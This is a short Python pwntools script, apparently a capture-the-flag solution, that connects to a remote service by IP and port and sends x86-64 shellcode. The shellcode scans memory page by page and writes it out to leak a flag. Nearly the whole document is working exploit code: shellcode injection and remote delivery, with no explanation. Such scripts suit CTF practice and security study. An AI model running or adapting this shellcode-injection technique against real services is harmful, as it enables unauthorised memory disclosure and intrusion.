#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./ihnsaims", checksec=False)
# r = process("./ihnsaims flag{fake_flag}", shell=True)
r = remote("54.85.45.101", 8002)

# funcs
s = lambda a: r.sendafter(b"!\n", a)

# write
s(b"1")

# shellcode
sc = """
lea r12, [rdx]
a:
lea r12, [r12+0x1000]
mov rdi, 1
mov rsi, r12
mov rdx, 0x1000
mov rax, 1
syscall
cmp rax, -14
je a
jne b
b:
xor rdi, rdi
mov rax, 231
syscall
"""
sc = asm(sc)
s(sc)

r.interactive()